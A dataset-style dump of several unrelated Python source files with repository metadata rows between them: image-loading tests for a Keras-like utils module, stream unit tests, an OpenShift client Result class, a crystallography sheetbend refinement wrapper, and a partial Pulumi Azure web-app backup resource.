assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read())
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode()
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff')
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8)
A[20:30, 45:55, 0] = 255
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
red_channel_arr = loaded_im_array[:, :, 0].astype(np.bool)
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
with pytest.raises(ValueError):
x = np.random.random((height, width))
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
| true
| true
|
f70b5ab5c5fcfa6cb7faa06d88ce4d7ec1a8cd30
| 1,525
|
py
|
Python
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 5
|
2019-04-02T07:01:34.000Z
|
2019-11-24T02:08:03.000Z
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 11
|
2019-03-20T08:29:30.000Z
|
2019-05-21T11:57:03.000Z
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 1
|
2019-04-02T15:24:40.000Z
|
2019-04-02T15:24:40.000Z
|
"""This module contains unit tests for stream module."""
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
"""Returns stream object"""
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
"""Checks Stream.next_line"""
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
"""Checks Stream.next"""
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
"""Checks Stream.eol"""
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
"""Checks Stream.eof"""
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
"""Checks Stream.throw"""
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
| 18.154762
| 56
| 0.591475
|
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
| true
| true
|
f70b5ae82ddf77d29a0ee10d330906455aea832b
| 3,360
|
py
|
Python
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 41
|
2019-04-12T21:07:02.000Z
|
2022-02-21T20:01:18.000Z
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 27
|
2019-07-11T21:26:27.000Z
|
2021-11-29T17:28:42.000Z
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 33
|
2019-04-10T17:37:01.000Z
|
2022-03-08T01:05:45.000Z
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
# if tracking_limit is less than 0 that means unlimited tracking_limit
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
# Returns a bitwise OR of all underlying action statuses (if 0, all actions returned 0)
def status(self):
s = 0
for action in self.__actions:
# If not the last attempt, return status does not matter; errors ignored.
if action.last_attempt:
s |= int(action.status)
return s
# Returns aggregate stdout from all underlying actions
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
"""
:return: Iterates through all actions in this Result and returns the first Action object
it finds that indicates it timed out. If no action timed out, returns None.
"""
for action in self.__actions:
if action.timeout:
return action
return None
# Returns aggregate stderr from all underlying actions
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
| 35
| 117
| 0.609821
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
def status(self):
s = 0
for action in self.__actions:
if action.last_attempt:
s |= int(action.status)
return s
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
for action in self.__actions:
if action.timeout:
return action
return None
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
| true
| true
|
f70b5b13da8974a7a5b30eaef4bc634bbeef2ad0
| 5,029
|
py
|
Python
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 2
|
2017-02-14T15:31:30.000Z
|
2019-07-20T12:30:59.000Z
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 65
|
2017-02-14T14:19:28.000Z
|
2021-09-21T09:50:02.000Z
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 7
|
2017-05-09T15:27:08.000Z
|
2021-06-13T13:32:40.000Z
|
#!/usr/bin/env ccp4-python
"""Module to run sheetbend on a model"""
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
"""Class to run sheetbend"""
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbout = None
self._pdbout = None
self._work_dir = None
# Temporary path for testing
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
"""The input hkl file"""
return self._hklin
@hklin.setter
def hklin(self, hklin):
"""Define the input hkl file"""
self._hklin = hklin
@property
def hklout(self):
"""The output hkl file"""
return self._hklout
@hklout.setter
def hklout(self, hklout):
"""Define the output hkl file"""
self._hklout = hklout
@property
def logfile(self):
"""The logfile output"""
return self._logfile
@logfile.setter
def logfile(self, logfile):
"""Define the output logfile"""
self._logfile = logfile
@property
def pdbin(self):
"""The input pdb file"""
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
"""Define the input pdb file"""
self._pdbin = pdbin
@property
def pdbout(self):
"""The output pdb file"""
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
"""Define the output pdb file"""
self._pdbout = pdbout
@property
def work_dir(self):
"""The path to the working directory"""
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
"""Define the working directory"""
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
# Make a note of the current working directory
current_work_dir = os.getcwd()
# Change to the sheetbend working directory
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
# Perform a cycle of Refmac to get output hkl
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
# Return to original working directory
os.chdir(current_work_dir)
@staticmethod
def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
"""Function to run refinement using sheetbend
Parameters
----------
hklin : str
Path to the input hkl file
pdbin : str
Path to the input pdb
pdbout : str
Path to the output pdb
ncyc : int
Number of cycles to run
logfile : str
Path to the output log
Returns
-------
file
Output pdb file
file
Output log file
"""
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path the input hkl file")
group.add_argument("-hklout", type=str, help="Path the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
| 28.737143
| 149
| 0.608471
|
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbout = None
self._pdbout = None
self._work_dir = None
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
return self._hklin
@hklin.setter
def hklin(self, hklin):
self._hklin = hklin
@property
def hklout(self):
return self._hklout
@hklout.setter
def hklout(self, hklout):
self._hklout = hklout
@property
def logfile(self):
return self._logfile
@logfile.setter
def logfile(self, logfile):
self._logfile = logfile
@property
def pdbin(self):
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
self._pdbin = pdbin
@property
def pdbout(self):
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
self._pdbout = pdbout
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
current_work_dir = os.getcwd()
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
os.chdir(current_work_dir)
@staticmethod
def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path the input hkl file")
group.add_argument("-hklout", type=str, help="Path the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
| true
| true
|
f70b5bc19f060360f1fc41d6395e3d53e284fb88
| 8,628
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Description of a backup which will be performed.
API Version: 2020-10-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backup_name: Name of the backup.
:param pulumi.Input[pulumi.InputType['BackupScheduleArgs']] backup_schedule: Schedule for the backup if it is executed periodically.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]] databases: Databases included in the backup.
:param pulumi.Input[bool] enabled: True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of the app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] slot: Name of the deployment slot. If a slot is not specified, the API will update the backup configuration for the production slot.
:param pulumi.Input[str] storage_account_url: SAS URL to the container.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
